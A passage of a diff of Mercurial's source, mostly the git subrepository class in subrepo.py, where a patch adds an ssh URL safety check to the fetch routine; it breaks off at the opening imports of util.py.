1525 return branch2rev, rev2branch
1522
1526
1523 def _gittracking(self, branches):
1527 def _gittracking(self, branches):
1524 'return map of remote branch to local tracking branch'
1528 'return map of remote branch to local tracking branch'
1525 # assumes no more than one local tracking branch for each remote
1529 # assumes no more than one local tracking branch for each remote
1526 tracking = {}
1530 tracking = {}
1527 for b in branches:
1531 for b in branches:
1528 if b.startswith('refs/remotes/'):
1532 if b.startswith('refs/remotes/'):
1529 continue
1533 continue
1530 bname = b.split('/', 2)[2]
1534 bname = b.split('/', 2)[2]
1531 remote = self._gitcommand(['config', 'branch.%s.remote' % bname])
1535 remote = self._gitcommand(['config', 'branch.%s.remote' % bname])
1532 if remote:
1536 if remote:
1533 ref = self._gitcommand(['config', 'branch.%s.merge' % bname])
1537 ref = self._gitcommand(['config', 'branch.%s.merge' % bname])
1534 tracking['refs/remotes/%s/%s' %
1538 tracking['refs/remotes/%s/%s' %
1535 (remote, ref.split('/', 2)[2])] = b
1539 (remote, ref.split('/', 2)[2])] = b
1536 return tracking
1540 return tracking
1537
1541
1538 def _abssource(self, source):
1542 def _abssource(self, source):
1539 if '://' not in source:
1543 if '://' not in source:
1540 # recognize the scp syntax as an absolute source
1544 # recognize the scp syntax as an absolute source
1541 colon = source.find(':')
1545 colon = source.find(':')
1542 if colon != -1 and '/' not in source[:colon]:
1546 if colon != -1 and '/' not in source[:colon]:
1543 return source
1547 return source
1544 self._subsource = source
1548 self._subsource = source
1545 return _abssource(self)
1549 return _abssource(self)
1546
1550
1547 def _fetch(self, source, revision):
1551 def _fetch(self, source, revision):
1548 if self._gitmissing():
1552 if self._gitmissing():
1553 # SEC: check for safe ssh url
1554 util.checksafessh(source)
1555
1549 source = self._abssource(source)
1556 source = self._abssource(source)
1550 self.ui.status(_('cloning subrepo %s from %s\n') %
1557 self.ui.status(_('cloning subrepo %s from %s\n') %
1551 (self._relpath, source))
1558 (self._relpath, source))
1552 self._gitnodir(['clone', source, self._abspath])
1559 self._gitnodir(['clone', source, self._abspath])
1553 if self._githavelocally(revision):
1560 if self._githavelocally(revision):
1554 return
1561 return
1555 self.ui.status(_('pulling subrepo %s from %s\n') %
1562 self.ui.status(_('pulling subrepo %s from %s\n') %
1556 (self._relpath, self._gitremote('origin')))
1563 (self._relpath, self._gitremote('origin')))
1557 # try only origin: the originally cloned repo
1564 # try only origin: the originally cloned repo
1558 self._gitcommand(['fetch'])
1565 self._gitcommand(['fetch'])
1559 if not self._githavelocally(revision):
1566 if not self._githavelocally(revision):
1560 raise error.Abort(_('revision %s does not exist in subrepository '
1567 raise error.Abort(_('revision %s does not exist in subrepository '
1561 '"%s"\n') % (revision, self._relpath))
1568 '"%s"\n') % (revision, self._relpath))
1562
1569
1563 @annotatesubrepoerror
1570 @annotatesubrepoerror
1564 def dirty(self, ignoreupdate=False, missing=False):
1571 def dirty(self, ignoreupdate=False, missing=False):
1565 if self._gitmissing():
1572 if self._gitmissing():
1566 return self._state[1] != ''
1573 return self._state[1] != ''
1567 if self._gitisbare():
1574 if self._gitisbare():
1568 return True
1575 return True
1569 if not ignoreupdate and self._state[1] != self._gitstate():
1576 if not ignoreupdate and self._state[1] != self._gitstate():
1570 # different version checked out
1577 # different version checked out
1571 return True
1578 return True
1572 # check for staged changes or modified files; ignore untracked files
1579 # check for staged changes or modified files; ignore untracked files
1573 self._gitupdatestat()
1580 self._gitupdatestat()
1574 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1581 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1575 return code == 1
1582 return code == 1
1576
1583
1577 def basestate(self):
1584 def basestate(self):
1578 return self._gitstate()
1585 return self._gitstate()
1579
1586
1580 @annotatesubrepoerror
1587 @annotatesubrepoerror
1581 def get(self, state, overwrite=False):
1588 def get(self, state, overwrite=False):
1582 source, revision, kind = state
1589 source, revision, kind = state
1583 if not revision:
1590 if not revision:
1584 self.remove()
1591 self.remove()
1585 return
1592 return
1586 self._fetch(source, revision)
1593 self._fetch(source, revision)
1587 # if the repo was set to be bare, unbare it
1594 # if the repo was set to be bare, unbare it
1588 if self._gitisbare():
1595 if self._gitisbare():
1589 self._gitcommand(['config', 'core.bare', 'false'])
1596 self._gitcommand(['config', 'core.bare', 'false'])
1590 if self._gitstate() == revision:
1597 if self._gitstate() == revision:
1591 self._gitcommand(['reset', '--hard', 'HEAD'])
1598 self._gitcommand(['reset', '--hard', 'HEAD'])
1592 return
1599 return
1593 elif self._gitstate() == revision:
1600 elif self._gitstate() == revision:
1594 if overwrite:
1601 if overwrite:
1595 # first reset the index to unmark new files for commit, because
1602 # first reset the index to unmark new files for commit, because
1596 # reset --hard will otherwise throw away files added for commit,
1603 # reset --hard will otherwise throw away files added for commit,
1597 # not just unmark them.
1604 # not just unmark them.
1598 self._gitcommand(['reset', 'HEAD'])
1605 self._gitcommand(['reset', 'HEAD'])
1599 self._gitcommand(['reset', '--hard', 'HEAD'])
1606 self._gitcommand(['reset', '--hard', 'HEAD'])
1600 return
1607 return
1601 branch2rev, rev2branch = self._gitbranchmap()
1608 branch2rev, rev2branch = self._gitbranchmap()
1602
1609
1603 def checkout(args):
1610 def checkout(args):
1604 cmd = ['checkout']
1611 cmd = ['checkout']
1605 if overwrite:
1612 if overwrite:
1606 # first reset the index to unmark new files for commit, because
1613 # first reset the index to unmark new files for commit, because
1607 # the -f option will otherwise throw away files added for
1614 # the -f option will otherwise throw away files added for
1608 # commit, not just unmark them.
1615 # commit, not just unmark them.
1609 self._gitcommand(['reset', 'HEAD'])
1616 self._gitcommand(['reset', 'HEAD'])
1610 cmd.append('-f')
1617 cmd.append('-f')
1611 self._gitcommand(cmd + args)
1618 self._gitcommand(cmd + args)
1612 _sanitize(self.ui, self.wvfs, '.git')
1619 _sanitize(self.ui, self.wvfs, '.git')
1613
1620
1614 def rawcheckout():
1621 def rawcheckout():
1615 # no branch to checkout, check it out with no branch
1622 # no branch to checkout, check it out with no branch
1616 self.ui.warn(_('checking out detached HEAD in '
1623 self.ui.warn(_('checking out detached HEAD in '
1617 'subrepository "%s"\n') % self._relpath)
1624 'subrepository "%s"\n') % self._relpath)
1618 self.ui.warn(_('check out a git branch if you intend '
1625 self.ui.warn(_('check out a git branch if you intend '
1619 'to make changes\n'))
1626 'to make changes\n'))
1620 checkout(['-q', revision])
1627 checkout(['-q', revision])
1621
1628
1622 if revision not in rev2branch:
1629 if revision not in rev2branch:
1623 rawcheckout()
1630 rawcheckout()
1624 return
1631 return
1625 branches = rev2branch[revision]
1632 branches = rev2branch[revision]
1626 firstlocalbranch = None
1633 firstlocalbranch = None
1627 for b in branches:
1634 for b in branches:
1628 if b == 'refs/heads/master':
1635 if b == 'refs/heads/master':
1629 # master trumps all other branches
1636 # master trumps all other branches
1630 checkout(['refs/heads/master'])
1637 checkout(['refs/heads/master'])
1631 return
1638 return
1632 if not firstlocalbranch and not b.startswith('refs/remotes/'):
1639 if not firstlocalbranch and not b.startswith('refs/remotes/'):
1633 firstlocalbranch = b
1640 firstlocalbranch = b
1634 if firstlocalbranch:
1641 if firstlocalbranch:
1635 checkout([firstlocalbranch])
1642 checkout([firstlocalbranch])
1636 return
1643 return
1637
1644
1638 tracking = self._gittracking(branch2rev.keys())
1645 tracking = self._gittracking(branch2rev.keys())
1639 # choose a remote branch already tracked if possible
1646 # choose a remote branch already tracked if possible
1640 remote = branches[0]
1647 remote = branches[0]
1641 if remote not in tracking:
1648 if remote not in tracking:
1642 for b in branches:
1649 for b in branches:
1643 if b in tracking:
1650 if b in tracking:
1644 remote = b
1651 remote = b
1645 break
1652 break
1646
1653
1647 if remote not in tracking:
1654 if remote not in tracking:
1648 # create a new local tracking branch
1655 # create a new local tracking branch
1649 local = remote.split('/', 3)[3]
1656 local = remote.split('/', 3)[3]
1650 checkout(['-b', local, remote])
1657 checkout(['-b', local, remote])
1651 elif self._gitisancestor(branch2rev[tracking[remote]], remote):
1658 elif self._gitisancestor(branch2rev[tracking[remote]], remote):
1652 # When updating to a tracked remote branch,
1659 # When updating to a tracked remote branch,
1653 # if the local tracking branch is downstream of it,
1660 # if the local tracking branch is downstream of it,
1654 # a normal `git pull` would have performed a "fast-forward merge"
1661 # a normal `git pull` would have performed a "fast-forward merge"
1655 # which is equivalent to updating the local branch to the remote.
1662 # which is equivalent to updating the local branch to the remote.
1656 # Since we are only looking at branching at update, we need to
1663 # Since we are only looking at branching at update, we need to
1657 # detect this situation and perform this action lazily.
1664 # detect this situation and perform this action lazily.
1658 if tracking[remote] != self._gitcurrentbranch():
1665 if tracking[remote] != self._gitcurrentbranch():
1659 checkout([tracking[remote]])
1666 checkout([tracking[remote]])
1660 self._gitcommand(['merge', '--ff', remote])
1667 self._gitcommand(['merge', '--ff', remote])
1661 _sanitize(self.ui, self.wvfs, '.git')
1668 _sanitize(self.ui, self.wvfs, '.git')
1662 else:
1669 else:
1663 # a real merge would be required, just checkout the revision
1670 # a real merge would be required, just checkout the revision
1664 rawcheckout()
1671 rawcheckout()
1665
1672
1666 @annotatesubrepoerror
1673 @annotatesubrepoerror
1667 def commit(self, text, user, date):
1674 def commit(self, text, user, date):
1668 if self._gitmissing():
1675 if self._gitmissing():
1669 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1676 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1670 cmd = ['commit', '-a', '-m', text]
1677 cmd = ['commit', '-a', '-m', text]
1671 env = encoding.environ.copy()
1678 env = encoding.environ.copy()
1672 if user:
1679 if user:
1673 cmd += ['--author', user]
1680 cmd += ['--author', user]
1674 if date:
1681 if date:
1675 # git's date parser silently ignores when seconds < 1e9
1682 # git's date parser silently ignores when seconds < 1e9
1676 # convert to ISO8601
1683 # convert to ISO8601
1677 env['GIT_AUTHOR_DATE'] = util.datestr(date,
1684 env['GIT_AUTHOR_DATE'] = util.datestr(date,
1678 '%Y-%m-%dT%H:%M:%S %1%2')
1685 '%Y-%m-%dT%H:%M:%S %1%2')
1679 self._gitcommand(cmd, env=env)
1686 self._gitcommand(cmd, env=env)
1680 # make sure commit works otherwise HEAD might not exist under certain
1687 # make sure commit works otherwise HEAD might not exist under certain
1681 # circumstances
1688 # circumstances
1682 return self._gitstate()
1689 return self._gitstate()
1683
1690
1684 @annotatesubrepoerror
1691 @annotatesubrepoerror
1685 def merge(self, state):
1692 def merge(self, state):
1686 source, revision, kind = state
1693 source, revision, kind = state
1687 self._fetch(source, revision)
1694 self._fetch(source, revision)
1688 base = self._gitcommand(['merge-base', revision, self._state[1]])
1695 base = self._gitcommand(['merge-base', revision, self._state[1]])
1689 self._gitupdatestat()
1696 self._gitupdatestat()
1690 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1697 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1691
1698
1692 def mergefunc():
1699 def mergefunc():
1693 if base == revision:
1700 if base == revision:
1694 self.get(state) # fast forward merge
1701 self.get(state) # fast forward merge
1695 elif base != self._state[1]:
1702 elif base != self._state[1]:
1696 self._gitcommand(['merge', '--no-commit', revision])
1703 self._gitcommand(['merge', '--no-commit', revision])
1697 _sanitize(self.ui, self.wvfs, '.git')
1704 _sanitize(self.ui, self.wvfs, '.git')
1698
1705
1699 if self.dirty():
1706 if self.dirty():
1700 if self._gitstate() != revision:
1707 if self._gitstate() != revision:
1701 dirty = self._gitstate() == self._state[1] or code != 0
1708 dirty = self._gitstate() == self._state[1] or code != 0
1702 if _updateprompt(self.ui, self, dirty,
1709 if _updateprompt(self.ui, self, dirty,
1703 self._state[1][:7], revision[:7]):
1710 self._state[1][:7], revision[:7]):
1704 mergefunc()
1711 mergefunc()
1705 else:
1712 else:
1706 mergefunc()
1713 mergefunc()
1707
1714
1708 @annotatesubrepoerror
1715 @annotatesubrepoerror
1709 def push(self, opts):
1716 def push(self, opts):
1710 force = opts.get('force')
1717 force = opts.get('force')
1711
1718
1712 if not self._state[1]:
1719 if not self._state[1]:
1713 return True
1720 return True
1714 if self._gitmissing():
1721 if self._gitmissing():
1715 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1722 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1716 # if a branch in origin contains the revision, nothing to do
1723 # if a branch in origin contains the revision, nothing to do
1717 branch2rev, rev2branch = self._gitbranchmap()
1724 branch2rev, rev2branch = self._gitbranchmap()
1718 if self._state[1] in rev2branch:
1725 if self._state[1] in rev2branch:
1719 for b in rev2branch[self._state[1]]:
1726 for b in rev2branch[self._state[1]]:
1720 if b.startswith('refs/remotes/origin/'):
1727 if b.startswith('refs/remotes/origin/'):
1721 return True
1728 return True
1722 for b, revision in branch2rev.iteritems():
1729 for b, revision in branch2rev.iteritems():
1723 if b.startswith('refs/remotes/origin/'):
1730 if b.startswith('refs/remotes/origin/'):
1724 if self._gitisancestor(self._state[1], revision):
1731 if self._gitisancestor(self._state[1], revision):
1725 return True
1732 return True
1726 # otherwise, try to push the currently checked out branch
1733 # otherwise, try to push the currently checked out branch
1727 cmd = ['push']
1734 cmd = ['push']
1728 if force:
1735 if force:
1729 cmd.append('--force')
1736 cmd.append('--force')
1730
1737
1731 current = self._gitcurrentbranch()
1738 current = self._gitcurrentbranch()
1732 if current:
1739 if current:
1733 # determine if the current branch is even useful
1740 # determine if the current branch is even useful
1734 if not self._gitisancestor(self._state[1], current):
1741 if not self._gitisancestor(self._state[1], current):
1735 self.ui.warn(_('unrelated git branch checked out '
1742 self.ui.warn(_('unrelated git branch checked out '
1736 'in subrepository "%s"\n') % self._relpath)
1743 'in subrepository "%s"\n') % self._relpath)
1737 return False
1744 return False
1738 self.ui.status(_('pushing branch %s of subrepository "%s"\n') %
1745 self.ui.status(_('pushing branch %s of subrepository "%s"\n') %
1739 (current.split('/', 2)[2], self._relpath))
1746 (current.split('/', 2)[2], self._relpath))
1740 ret = self._gitdir(cmd + ['origin', current])
1747 ret = self._gitdir(cmd + ['origin', current])
1741 return ret[1] == 0
1748 return ret[1] == 0
1742 else:
1749 else:
1743 self.ui.warn(_('no branch checked out in subrepository "%s"\n'
1750 self.ui.warn(_('no branch checked out in subrepository "%s"\n'
1744 'cannot push revision %s\n') %
1751 'cannot push revision %s\n') %
1745 (self._relpath, self._state[1]))
1752 (self._relpath, self._state[1]))
1746 return False
1753 return False
1747
1754
1748 @annotatesubrepoerror
1755 @annotatesubrepoerror
1749 def add(self, ui, match, prefix, explicitonly, **opts):
1756 def add(self, ui, match, prefix, explicitonly, **opts):
1750 if self._gitmissing():
1757 if self._gitmissing():
1751 return []
1758 return []
1752
1759
1753 (modified, added, removed,
1760 (modified, added, removed,
1754 deleted, unknown, ignored, clean) = self.status(None, unknown=True,
1761 deleted, unknown, ignored, clean) = self.status(None, unknown=True,
1755 clean=True)
1762 clean=True)
1756
1763
1757 tracked = set()
1764 tracked = set()
1758 # dirstates 'amn' warn, 'r' is added again
1765 # dirstates 'amn' warn, 'r' is added again
1759 for l in (modified, added, deleted, clean):
1766 for l in (modified, added, deleted, clean):
1760 tracked.update(l)
1767 tracked.update(l)
1761
1768
1762 # Unknown files not of interest will be rejected by the matcher
1769 # Unknown files not of interest will be rejected by the matcher
1763 files = unknown
1770 files = unknown
1764 files.extend(match.files())
1771 files.extend(match.files())
1765
1772
1766 rejected = []
1773 rejected = []
1767
1774
1768 files = [f for f in sorted(set(files)) if match(f)]
1775 files = [f for f in sorted(set(files)) if match(f)]
1769 for f in files:
1776 for f in files:
1770 exact = match.exact(f)
1777 exact = match.exact(f)
1771 command = ["add"]
1778 command = ["add"]
1772 if exact:
1779 if exact:
1773 command.append("-f") #should be added, even if ignored
1780 command.append("-f") #should be added, even if ignored
1774 if ui.verbose or not exact:
1781 if ui.verbose or not exact:
1775 ui.status(_('adding %s\n') % match.rel(f))
1782 ui.status(_('adding %s\n') % match.rel(f))
1776
1783
1777 if f in tracked: # hg prints 'adding' even if already tracked
1784 if f in tracked: # hg prints 'adding' even if already tracked
1778 if exact:
1785 if exact:
1779 rejected.append(f)
1786 rejected.append(f)
1780 continue
1787 continue
1781 if not opts.get(r'dry_run'):
1788 if not opts.get(r'dry_run'):
1782 self._gitcommand(command + [f])
1789 self._gitcommand(command + [f])
1783
1790
1784 for f in rejected:
1791 for f in rejected:
1785 ui.warn(_("%s already tracked!\n") % match.abs(f))
1792 ui.warn(_("%s already tracked!\n") % match.abs(f))
1786
1793
1787 return rejected
1794 return rejected
1788
1795
1789 @annotatesubrepoerror
1796 @annotatesubrepoerror
1790 def remove(self):
1797 def remove(self):
1791 if self._gitmissing():
1798 if self._gitmissing():
1792 return
1799 return
1793 if self.dirty():
1800 if self.dirty():
1794 self.ui.warn(_('not removing repo %s because '
1801 self.ui.warn(_('not removing repo %s because '
1795 'it has changes.\n') % self._relpath)
1802 'it has changes.\n') % self._relpath)
1796 return
1803 return
1797 # we can't fully delete the repository as it may contain
1804 # we can't fully delete the repository as it may contain
1798 # local-only history
1805 # local-only history
1799 self.ui.note(_('removing subrepo %s\n') % self._relpath)
1806 self.ui.note(_('removing subrepo %s\n') % self._relpath)
1800 self._gitcommand(['config', 'core.bare', 'true'])
1807 self._gitcommand(['config', 'core.bare', 'true'])
1801 for f, kind in self.wvfs.readdir():
1808 for f, kind in self.wvfs.readdir():
1802 if f == '.git':
1809 if f == '.git':
1803 continue
1810 continue
1804 if kind == stat.S_IFDIR:
1811 if kind == stat.S_IFDIR:
1805 self.wvfs.rmtree(f)
1812 self.wvfs.rmtree(f)
1806 else:
1813 else:
1807 self.wvfs.unlink(f)
1814 self.wvfs.unlink(f)
1808
1815
1809 def archive(self, archiver, prefix, match=None, decode=True):
1816 def archive(self, archiver, prefix, match=None, decode=True):
1810 total = 0
1817 total = 0
1811 source, revision = self._state
1818 source, revision = self._state
1812 if not revision:
1819 if not revision:
1813 return total
1820 return total
1814 self._fetch(source, revision)
1821 self._fetch(source, revision)
1815
1822
1816 # Parse git's native archive command.
1823 # Parse git's native archive command.
1817 # This should be much faster than manually traversing the trees
1824 # This should be much faster than manually traversing the trees
1818 # and objects with many subprocess calls.
1825 # and objects with many subprocess calls.
1819 tarstream = self._gitcommand(['archive', revision], stream=True)
1826 tarstream = self._gitcommand(['archive', revision], stream=True)
1820 tar = tarfile.open(fileobj=tarstream, mode='r|')
1827 tar = tarfile.open(fileobj=tarstream, mode='r|')
1821 relpath = subrelpath(self)
1828 relpath = subrelpath(self)
1822 self.ui.progress(_('archiving (%s)') % relpath, 0, unit=_('files'))
1829 self.ui.progress(_('archiving (%s)') % relpath, 0, unit=_('files'))
1823 for i, info in enumerate(tar):
1830 for i, info in enumerate(tar):
1824 if info.isdir():
1831 if info.isdir():
1825 continue
1832 continue
1826 if match and not match(info.name):
1833 if match and not match(info.name):
1827 continue
1834 continue
1828 if info.issym():
1835 if info.issym():
1829 data = info.linkname
1836 data = info.linkname
1830 else:
1837 else:
1831 data = tar.extractfile(info).read()
1838 data = tar.extractfile(info).read()
1832 archiver.addfile(prefix + self._path + '/' + info.name,
1839 archiver.addfile(prefix + self._path + '/' + info.name,
1833 info.mode, info.issym(), data)
1840 info.mode, info.issym(), data)
1834 total += 1
1841 total += 1
1835 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
1842 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
1836 unit=_('files'))
1843 unit=_('files'))
1837 self.ui.progress(_('archiving (%s)') % relpath, None)
1844 self.ui.progress(_('archiving (%s)') % relpath, None)
1838 return total
1845 return total
1839
1846
1840
1847
1841 @annotatesubrepoerror
1848 @annotatesubrepoerror
1842 def cat(self, match, fm, fntemplate, prefix, **opts):
1849 def cat(self, match, fm, fntemplate, prefix, **opts):
1843 rev = self._state[1]
1850 rev = self._state[1]
1844 if match.anypats():
1851 if match.anypats():
1845 return 1 #No support for include/exclude yet
1852 return 1 #No support for include/exclude yet
1846
1853
1847 if not match.files():
1854 if not match.files():
1848 return 1
1855 return 1
1849
1856
1850 # TODO: add support for non-plain formatter (see cmdutil.cat())
1857 # TODO: add support for non-plain formatter (see cmdutil.cat())
1851 for f in match.files():
1858 for f in match.files():
1852 output = self._gitcommand(["show", "%s:%s" % (rev, f)])
1859 output = self._gitcommand(["show", "%s:%s" % (rev, f)])
1853 fp = cmdutil.makefileobj(self._subparent, fntemplate,
1860 fp = cmdutil.makefileobj(self._subparent, fntemplate,
1854 self._ctx.node(),
1861 self._ctx.node(),
1855 pathname=self.wvfs.reljoin(prefix, f))
1862 pathname=self.wvfs.reljoin(prefix, f))
1856 fp.write(output)
1863 fp.write(output)
1857 fp.close()
1864 fp.close()
1858 return 0
1865 return 0
1859
1866
1860
1867
1861 @annotatesubrepoerror
1868 @annotatesubrepoerror
1862 def status(self, rev2, **opts):
1869 def status(self, rev2, **opts):
1863 rev1 = self._state[1]
1870 rev1 = self._state[1]
1864 if self._gitmissing() or not rev1:
1871 if self._gitmissing() or not rev1:
1865 # if the repo is missing, return no results
1872 # if the repo is missing, return no results
1866 return scmutil.status([], [], [], [], [], [], [])
1873 return scmutil.status([], [], [], [], [], [], [])
1867 modified, added, removed = [], [], []
1874 modified, added, removed = [], [], []
1868 self._gitupdatestat()
1875 self._gitupdatestat()
1869 if rev2:
1876 if rev2:
1870 command = ['diff-tree', '--no-renames', '-r', rev1, rev2]
1877 command = ['diff-tree', '--no-renames', '-r', rev1, rev2]
1871 else:
1878 else:
1872 command = ['diff-index', '--no-renames', rev1]
1879 command = ['diff-index', '--no-renames', rev1]
1873 out = self._gitcommand(command)
1880 out = self._gitcommand(command)
1874 for line in out.split('\n'):
1881 for line in out.split('\n'):
1875 tab = line.find('\t')
1882 tab = line.find('\t')
1876 if tab == -1:
1883 if tab == -1:
1877 continue
1884 continue
1878 status, f = line[tab - 1], line[tab + 1:]
1885 status, f = line[tab - 1], line[tab + 1:]
1879 if status == 'M':
1886 if status == 'M':
1880 modified.append(f)
1887 modified.append(f)
1881 elif status == 'A':
1888 elif status == 'A':
1882 added.append(f)
1889 added.append(f)
1883 elif status == 'D':
1890 elif status == 'D':
1884 removed.append(f)
1891 removed.append(f)
1885
1892
1886 deleted, unknown, ignored, clean = [], [], [], []
1893 deleted, unknown, ignored, clean = [], [], [], []
1887
1894
1888 command = ['status', '--porcelain', '-z']
1895 command = ['status', '--porcelain', '-z']
1889 if opts.get(r'unknown'):
1896 if opts.get(r'unknown'):
1890 command += ['--untracked-files=all']
1897 command += ['--untracked-files=all']
1891 if opts.get(r'ignored'):
1898 if opts.get(r'ignored'):
1892 command += ['--ignored']
1899 command += ['--ignored']
1893 out = self._gitcommand(command)
1900 out = self._gitcommand(command)
1894
1901
1895 changedfiles = set()
1902 changedfiles = set()
1896 changedfiles.update(modified)
1903 changedfiles.update(modified)
1897 changedfiles.update(added)
1904 changedfiles.update(added)
1898 changedfiles.update(removed)
1905 changedfiles.update(removed)
1899 for line in out.split('\0'):
1906 for line in out.split('\0'):
1900 if not line:
1907 if not line:
1901 continue
1908 continue
1902 st = line[0:2]
1909 st = line[0:2]
1903 #moves and copies show 2 files on one line
1910 #moves and copies show 2 files on one line
1904 if line.find('\0') >= 0:
1911 if line.find('\0') >= 0:
1905 filename1, filename2 = line[3:].split('\0')
1912 filename1, filename2 = line[3:].split('\0')
1906 else:
1913 else:
1907 filename1 = line[3:]
1914 filename1 = line[3:]
1908 filename2 = None
1915 filename2 = None
1909
1916
1910 changedfiles.add(filename1)
1917 changedfiles.add(filename1)
1911 if filename2:
1918 if filename2:
1912 changedfiles.add(filename2)
1919 changedfiles.add(filename2)
1913
1920
1914 if st == '??':
1921 if st == '??':
1915 unknown.append(filename1)
1922 unknown.append(filename1)
1916 elif st == '!!':
1923 elif st == '!!':
1917 ignored.append(filename1)
1924 ignored.append(filename1)
1918
1925
1919 if opts.get(r'clean'):
1926 if opts.get(r'clean'):
1920 out = self._gitcommand(['ls-files'])
1927 out = self._gitcommand(['ls-files'])
1921 for f in out.split('\n'):
1928 for f in out.split('\n'):
1922 if not f in changedfiles:
1929 if not f in changedfiles:
1923 clean.append(f)
1930 clean.append(f)
1924
1931
1925 return scmutil.status(modified, added, removed, deleted,
1932 return scmutil.status(modified, added, removed, deleted,
1926 unknown, ignored, clean)
1933 unknown, ignored, clean)
1927
1934
1928 @annotatesubrepoerror
1935 @annotatesubrepoerror
1929 def diff(self, ui, diffopts, node2, match, prefix, **opts):
1936 def diff(self, ui, diffopts, node2, match, prefix, **opts):
1930 node1 = self._state[1]
1937 node1 = self._state[1]
1931 cmd = ['diff', '--no-renames']
1938 cmd = ['diff', '--no-renames']
1932 if opts[r'stat']:
1939 if opts[r'stat']:
1933 cmd.append('--stat')
1940 cmd.append('--stat')
1934 else:
1941 else:
1935 # for Git, this also implies '-p'
1942 # for Git, this also implies '-p'
1936 cmd.append('-U%d' % diffopts.context)
1943 cmd.append('-U%d' % diffopts.context)
1937
1944
1938 gitprefix = self.wvfs.reljoin(prefix, self._path)
1945 gitprefix = self.wvfs.reljoin(prefix, self._path)
1939
1946
1940 if diffopts.noprefix:
1947 if diffopts.noprefix:
1941 cmd.extend(['--src-prefix=%s/' % gitprefix,
1948 cmd.extend(['--src-prefix=%s/' % gitprefix,
1942 '--dst-prefix=%s/' % gitprefix])
1949 '--dst-prefix=%s/' % gitprefix])
1943 else:
1950 else:
1944 cmd.extend(['--src-prefix=a/%s/' % gitprefix,
1951 cmd.extend(['--src-prefix=a/%s/' % gitprefix,
1945 '--dst-prefix=b/%s/' % gitprefix])
1952 '--dst-prefix=b/%s/' % gitprefix])
1946
1953
1947 if diffopts.ignorews:
1954 if diffopts.ignorews:
1948 cmd.append('--ignore-all-space')
1955 cmd.append('--ignore-all-space')
1949 if diffopts.ignorewsamount:
1956 if diffopts.ignorewsamount:
1950 cmd.append('--ignore-space-change')
1957 cmd.append('--ignore-space-change')
1951 if self._gitversion(self._gitcommand(['--version'])) >= (1, 8, 4) \
1958 if self._gitversion(self._gitcommand(['--version'])) >= (1, 8, 4) \
1952 and diffopts.ignoreblanklines:
1959 and diffopts.ignoreblanklines:
1953 cmd.append('--ignore-blank-lines')
1960 cmd.append('--ignore-blank-lines')
1954
1961
1955 cmd.append(node1)
1962 cmd.append(node1)
1956 if node2:
1963 if node2:
1957 cmd.append(node2)
1964 cmd.append(node2)
1958
1965
1959 output = ""
1966 output = ""
1960 if match.always():
1967 if match.always():
1961 output += self._gitcommand(cmd) + '\n'
1968 output += self._gitcommand(cmd) + '\n'
1962 else:
1969 else:
1963 st = self.status(node2)[:3]
1970 st = self.status(node2)[:3]
1964 files = [f for sublist in st for f in sublist]
1971 files = [f for sublist in st for f in sublist]
1965 for f in files:
1972 for f in files:
1966 if match(f):
1973 if match(f):
1967 output += self._gitcommand(cmd + ['--', f]) + '\n'
1974 output += self._gitcommand(cmd + ['--', f]) + '\n'
1968
1975
1969 if output.strip():
1976 if output.strip():
1970 ui.write(output)
1977 ui.write(output)
1971
1978
1972 @annotatesubrepoerror
1979 @annotatesubrepoerror
1973 def revert(self, substate, *pats, **opts):
1980 def revert(self, substate, *pats, **opts):
1974 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1981 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1975 if not opts.get(r'no_backup'):
1982 if not opts.get(r'no_backup'):
1976 status = self.status(None)
1983 status = self.status(None)
1977 names = status.modified
1984 names = status.modified
1978 for name in names:
1985 for name in names:
1979 bakname = scmutil.origpath(self.ui, self._subparent, name)
1986 bakname = scmutil.origpath(self.ui, self._subparent, name)
1980 self.ui.note(_('saving current version of %s as %s\n') %
1987 self.ui.note(_('saving current version of %s as %s\n') %
1981 (name, bakname))
1988 (name, bakname))
1982 self.wvfs.rename(name, bakname)
1989 self.wvfs.rename(name, bakname)
1983
1990
1984 if not opts.get(r'dry_run'):
1991 if not opts.get(r'dry_run'):
1985 self.get(substate, overwrite=True)
1992 self.get(substate, overwrite=True)
1986 return []
1993 return []
1987
1994
1988 def shortid(self, revid):
1995 def shortid(self, revid):
1989 return revid[:7]
1996 return revid[:7]
1990
1997
1991 types = {
1998 types = {
1992 'hg': hgsubrepo,
1999 'hg': hgsubrepo,
1993 'svn': svnsubrepo,
2000 'svn': svnsubrepo,
1994 'git': gitsubrepo,
2001 'git': gitsubrepo,
1995 }
2002 }
@@ -1,3717 +1,3732 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import
16 from __future__ import absolute_import
17
17
18 import bz2
18 import bz2
19 import calendar
19 import calendar
20 import codecs
20 import codecs
21 import collections
21 import collections
22 import contextlib
22 import contextlib
23 import datetime
23 import datetime
24 import errno
24 import errno
25 import gc
25 import gc
26 import hashlib
26 import hashlib
27 import imp
27 import imp
28 import os
28 import os
29 import platform as pyplatform
29 import platform as pyplatform
30 import re as remod
30 import re as remod
31 import shutil
31 import shutil
32 import signal
32 import signal
33 import socket
33 import socket
34 import stat
34 import stat
35 import string
